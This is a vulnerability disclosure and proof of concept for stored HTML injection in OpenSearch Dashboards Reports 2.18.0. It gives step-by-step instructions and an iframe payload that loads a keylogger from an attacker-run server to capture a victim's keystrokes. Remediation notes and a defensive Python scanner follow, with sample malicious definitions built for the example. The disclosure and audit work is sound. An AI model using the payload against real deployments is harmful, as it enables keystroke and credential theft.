CVE-2024-54160 PoC: OpenSearch Dashboards Reports security vulnerability

Source
Related vulnerability
Title: OpenSearch Dashboards Reports security vulnerability (CVE-2024-54160)
Description: OpenSearch Dashboards Reports is an open-source OpenSearch application used to export and schedule PNG, PDF and CSV reports from OpenSearch Dashboards. The Dashboards Reports module contains a cross-site scripting (stored HTML injection) vulnerability in the report header/footer fields. The PoC below reproduces it on version 2.18.0; the fix shipped in 2.19.0.
Introduction
# [CVE-2024-54160]-Opensearch-HTML-Injection

It was found that the OpenSearch Dashboards plugin called "reports" (dashboards-reporting) was vulnerable to HTML injection in version 2.18.0.
The report functionality allowed users to store HTML in the header and footer while creating a new report definition, and that HTML was rendered without sanitization when the report was previewed.
Below is a quick proof of concept where I stored an iframe in the header that fetched a JavaScript keylogger from my local machine, which recorded the keys typed by the user.

# PoC
1. Edit the keylogger.html file and set the local IP on which the python3 http.server will be running.
2. Save keylogger.html.
3. Start the server with `python3 -m http.server` in the same directory as keylogger.html (it listens on port 8000 by default).
4. Go to Reports.
5. Fill in the required fields.
6. Select PDF.
7. Enable the header or footer.
8. Enter the iframe payload: `<iframe src="http://<IP>:8000/keylogger.html">`
9. Click "Preview". The keylogger should be loaded from the python server (the request for keylogger.html appears in its access log).
10. Type something on the keyboard and watch the requests arriving at the python server.

# Screenshot of the PoC in action
- The iframed content is rendered on the left (I know it's simple and ugly, but it works for a PoC :) ).
- The logged keystrokes are shown on the right. (The keylogger PoC was not optimal, since it missed some keystrokes!)

![Screenshot 2024-12-17 141054](https://github.com/user-attachments/assets/bc066e1e-3878-4d3e-9eb2-449066569427)

# Remedial Action
This is remediated in OpenSearch 2.19.0, where the data passed through the header/footer functionality is sanitized with DOMPurify. Note that the header and footer are stored as part of the report definition, so any user allowed to create or edit report definitions could plant the payload and it executes for whoever previews that report; until the upgrade, restrict who can create report definitions.
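Because the payload lives in stored report definitions, it is worth auditing existing definitions for HTML after (or before) upgrading. The scanner below is an added example for this README and is not code from the original page or from the dashboards-reporting project. It assumes the definitions are available as JSON objects with free-text fields named `header` and `footer` (an assumption; adjust `FIELDS` to the real schema) and uses the standard-library HTML parser rather than regexes, flagging dangerous elements, `on*` event handlers, `javascript:`/`data:` URLs and remote `src`/`href` targets. The sample definitions at the bottom are constructed for the example.

```python
"""Audit exported report definitions for HTML in header/footer fields.

Added example, not code from the original page or from the
dashboards-reporting project. Assumption: definitions are JSON objects and
the free-text fields are named "header" and "footer" (adjust FIELDS if the
real schema differs).
"""
import json
from html.parser import HTMLParser
from typing import Dict, List, Tuple

FIELDS = ("header", "footer")  # assumed field names, not the project's schema
# Elements that can load or run attacker-controlled content.
DANGEROUS_TAGS = {"iframe", "script", "object", "embed", "link", "meta",
                  "base", "form", "svg", "math"}
URL_ATTRS = ("src", "href", "action", "formaction", "data", "xlink:href")


class PayloadFinder(HTMLParser):
    """Collect (tag, reason) for every suspicious element or attribute."""

    def __init__(self):
        super().__init__()
        self.findings: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append((tag, "dangerous element"))
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip().lower()
            if name.startswith("on"):
                self.findings.append((tag, f"event handler attribute {name}"))
            elif name in URL_ATTRS and value.replace(" ", "").startswith(
                    ("javascript:", "data:", "vbscript:")):
                self.findings.append((tag, f"{name} uses {value.split(':')[0]}: URL"))
            elif name in ("src", "href") and value.startswith(("http://", "https://", "//")):
                self.findings.append((tag, f"{name} loads remote content"))

    # Self-closing tags (<iframe .../>) must be inspected the same way.
    handle_startendtag = handle_starttag


def scan_html(text: str) -> List[Tuple[str, str]]:
    """Return the findings for one header/footer string ([] if clean)."""
    p = PayloadFinder()
    p.feed(text)
    p.close()
    return p.findings


def audit_definitions(defs: List[Dict]) -> List[Dict]:
    """Return one entry per suspicious field across all definitions."""
    out = []
    for d in defs:
        for field in FIELDS:
            value = d.get(field)
            if isinstance(value, str) and value:
                hits = scan_html(value)
                if hits:
                    out.append({"id": d.get("id"), "field": field, "findings": hits})
    return out


# Constructed sample, not real data: one benign and one malicious definition.
SAMPLE_DEFINITIONS = json.loads("""[
  {"id": "rep-1", "name": "Weekly summary",
   "header": "<b>Weekly summary</b>", "footer": "Confidential"},
  {"id": "rep-2", "name": "Daily",
   "header": "<iframe src=\\"http://10.0.0.5:8000/keylogger.html\\"></iframe>",
   "footer": "<p onmouseover=alert(1)>hi</p>"}
]""")

if __name__ == "__main__":
    for finding in audit_definitions(SAMPLE_DEFINITIONS):
        print(json.dumps(finding))
```

Run it against a dump of your own definitions instead of `SAMPLE_DEFINITIONS`; any finding is a definition to review, since legitimate headers rarely need iframes, event handlers or remote resources.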

Release notes
https://github.com/opensearch-project/opensearch-build/blob/main/release-notes/opensearch-release-notes-2.19.0.md

# PR from Opensearch
https://github.com/opensearch-project/dashboards-reporting/pull/476
File snapshot

[4.0K] /data/pocs/f1b095c37f1bc87b5e9751adbbd5cb8c9aad5859
├── [1.0K] keylogger.html
└── [1.7K] README.md
0 directories, 2 files